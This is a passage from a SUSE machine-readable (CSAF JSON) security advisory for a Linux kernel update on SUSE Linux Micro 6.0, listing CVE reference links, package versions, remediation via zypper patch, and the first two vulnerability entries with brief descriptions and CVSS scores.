"url": "https://www.suse.com/security/cve/CVE-2025-68307/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68308 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68308/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68312 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68312/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68313 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68313/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68320 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68320/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68325 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68325/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68327 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68327/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68328 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68328/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68330 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68330/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68331 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68331/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68332 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68332/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68335 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68335/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68337 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68337/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68339 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68339/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68340 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68340/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68345 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68345/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68346 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68346/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68347 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68347/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68349 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68349/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68351 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68351/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68354 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68354/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68362 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68362/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68363 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68363/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68365 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68365/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68366 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68366/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68367 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68367/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68372 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68372/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68378 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68378/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68379 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68379/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68380 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68380/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68724 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68724/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68725 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68725/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68727 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68727/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68728 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68728/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68732 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68732/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68733 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68733/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68734 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68734/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68740 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68740/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68742 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68742/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68744 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68744/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68746 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68746/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68750 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68750/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68753 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68753/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68757 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68757/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68758 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68758/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68759 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68759/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68764 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68764/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68765 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68765/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68766 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68766/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68768 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68768/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68770 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68770/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68771 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68771/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68773 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68773/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68775 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68775/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68776 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68776/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68777 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68777/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68783 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68783/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68788 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68788/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68789 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68789/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68795 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68795/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68797 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68797/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68798 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68798/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68800 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68800/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68801 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68801/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68803 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68803/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68804 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68804/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68808 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68808/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68814 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68814/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68815 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68815/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68816 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68816/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68819 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68819/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68820 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68820/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71064 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71064/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71066 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71066/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71077 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71077/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71078 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71078/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71079 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71079/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71081 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71081/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71082 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71082/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71083 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71083/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71084 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71084/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71086 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71086/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71087 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71087/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71088 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71088/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71089 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71089/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71091 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71091/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71093 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71093/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71094 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71094/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71095 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71095/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71096 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71096/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71097 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71097/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71098 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71098/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71100 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71100/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71108 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71108/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71111 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71111/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71112 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71112/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71114 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71114/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71116 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71116/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71118 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71118/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71119 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71119/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71120 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71120/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71123 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71123/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71130 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71130/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71131 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71131/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71132 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71132/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71133 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71133/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71135 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71135/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71136 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71136/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71137 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71137/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71138 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71138/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71145 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71145/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71147 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71147/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71149 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71149/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71154 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71154/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71162 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71162/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71163 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71163/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22976 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22976/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22977 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22977/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22978 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22978/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22984 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22984/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22985 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22985/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22988 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22988/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22990 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22990/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22991 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22991/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22992 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22992/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22993 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22993/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22996 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22996/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22997 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22997/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22999 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22999/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23000 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23000/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23001 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23001/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23005 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23005/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23006 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23006/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23010 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23010/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23011 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23011/"
}
],
"title": "Security update for the Linux Kernel",
"tracking": {
"current_release_date": "2026-02-24T10:42:46Z",
"generator": {
"date": "2026-02-24T10:42:46Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:20477-1",
"initial_release_date": "2026-02-24T10:42:46Z",
"revision_history": [
{
"date": "2026-02-24T10:42:46Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-default-6.4.0-39.1.aarch64",
"product": {
"name": "kernel-default-6.4.0-39.1.aarch64",
"product_id": "kernel-default-6.4.0-39.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-default-base-6.4.0-39.1.21.16.aarch64",
"product": {
"name": "kernel-default-base-6.4.0-39.1.21.16.aarch64",
"product_id": "kernel-default-base-6.4.0-39.1.21.16.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-devel-6.4.0-39.1.noarch",
"product": {
"name": "kernel-devel-6.4.0-39.1.noarch",
"product_id": "kernel-devel-6.4.0-39.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-macros-6.4.0-39.1.noarch",
"product": {
"name": "kernel-macros-6.4.0-39.1.noarch",
"product_id": "kernel-macros-6.4.0-39.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-source-6.4.0-39.1.noarch",
"product": {
"name": "kernel-source-6.4.0-39.1.noarch",
"product_id": "kernel-source-6.4.0-39.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-default-6.4.0-39.1.s390x",
"product": {
"name": "kernel-default-6.4.0-39.1.s390x",
"product_id": "kernel-default-6.4.0-39.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-default-livepatch-6.4.0-39.1.s390x",
"product": {
"name": "kernel-default-livepatch-6.4.0-39.1.s390x",
"product_id": "kernel-default-livepatch-6.4.0-39.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-default-6.4.0-39.1.x86_64",
"product": {
"name": "kernel-default-6.4.0-39.1.x86_64",
"product_id": "kernel-default-6.4.0-39.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-base-6.4.0-39.1.21.16.x86_64",
"product": {
"name": "kernel-default-base-6.4.0-39.1.21.16.x86_64",
"product_id": "kernel-default-base-6.4.0-39.1.21.16.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-livepatch-6.4.0-39.1.x86_64",
"product": {
"name": "kernel-default-livepatch-6.4.0-39.1.x86_64",
"product_id": "kernel-default-livepatch-6.4.0-39.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-kvmsmall-6.4.0-39.1.x86_64",
"product": {
"name": "kernel-kvmsmall-6.4.0-39.1.x86_64",
"product_id": "kernel-kvmsmall-6.4.0-39.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Micro 6.0",
"product": {
"name": "SUSE Linux Micro 6.0",
"product_id": "SUSE Linux Micro 6.0",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sl-micro:6.0"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.4.0-39.1.aarch64 as component of SUSE Linux Micro 6.0",
"product_id": "SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64"
},
"product_reference": "kernel-default-6.4.0-39.1.aarch64",
"relates_to_product_reference": "SUSE Linux Micro 6.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.4.0-39.1.s390x as component of SUSE Linux Micro 6.0",
"product_id": "SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x"
},
"product_reference": "kernel-default-6.4.0-39.1.s390x",
"relates_to_product_reference": "SUSE Linux Micro 6.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.4.0-39.1.x86_64 as component of SUSE Linux Micro 6.0",
"product_id": "SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64"
},
"product_reference": "kernel-default-6.4.0-39.1.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-base-6.4.0-39.1.21.16.aarch64 as component of SUSE Linux Micro 6.0",
"product_id": "SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64"
},
"product_reference": "kernel-default-base-6.4.0-39.1.21.16.aarch64",
"relates_to_product_reference": "SUSE Linux Micro 6.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-base-6.4.0-39.1.21.16.x86_64 as component of SUSE Linux Micro 6.0",
"product_id": "SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64"
},
"product_reference": "kernel-default-base-6.4.0-39.1.21.16.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-livepatch-6.4.0-39.1.s390x as component of SUSE Linux Micro 6.0",
"product_id": "SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x"
},
"product_reference": "kernel-default-livepatch-6.4.0-39.1.s390x",
"relates_to_product_reference": "SUSE Linux Micro 6.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-livepatch-6.4.0-39.1.x86_64 as component of SUSE Linux Micro 6.0",
"product_id": "SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64"
},
"product_reference": "kernel-default-livepatch-6.4.0-39.1.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-6.4.0-39.1.noarch as component of SUSE Linux Micro 6.0",
"product_id": "SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch"
},
"product_reference": "kernel-devel-6.4.0-39.1.noarch",
"relates_to_product_reference": "SUSE Linux Micro 6.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-kvmsmall-6.4.0-39.1.x86_64 as component of SUSE Linux Micro 6.0",
"product_id": "SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64"
},
"product_reference": "kernel-kvmsmall-6.4.0-39.1.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-macros-6.4.0-39.1.noarch as component of SUSE Linux Micro 6.0",
"product_id": "SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch"
},
"product_reference": "kernel-macros-6.4.0-39.1.noarch",
"relates_to_product_reference": "SUSE Linux Micro 6.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-source-6.4.0-39.1.noarch as component of SUSE Linux Micro 6.0",
"product_id": "SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
},
"product_reference": "kernel-source-6.4.0-39.1.noarch",
"relates_to_product_reference": "SUSE Linux Micro 6.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-42752",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-42752"
}
],
"notes": [
{
"category": "general",
"text": "An integer overflow flaw was found in the Linux kernel. This issue leads to the kernel allocating `skb_shared_info` in the userspace, which is exploitable in systems without SMAP protection since `skb_shared_info` contains references to function pointers.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-42752",
"url": "https://www.suse.com/security/cve/CVE-2023-42752"
},
{
"category": "external",
"summary": "SUSE Bug 1215146 for CVE-2023-42752",
"url": "https://bugzilla.suse.com/1215146"
},
{
"category": "external",
"summary": "SUSE Bug 1215468 for CVE-2023-42752",
"url": "https://bugzilla.suse.com/1215468"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2023-42752"
},
{
"cve": "CVE-2023-53714",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53714"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/stm: ltdc: fix late dereference check\n\nIn ltdc_crtc_set_crc_source(), struct drm_crtc was dereferenced in a\ncontainer_of() before the pointer check. This could cause a kernel panic.\n\nFix this smatch warning:\ndrivers/gpu/drm/stm/ltdc.c:1124 ltdc_crtc_set_crc_source() warn: variable dereferenced before check \u0027crtc\u0027 (see line 1119)",
"title": "CVE description"
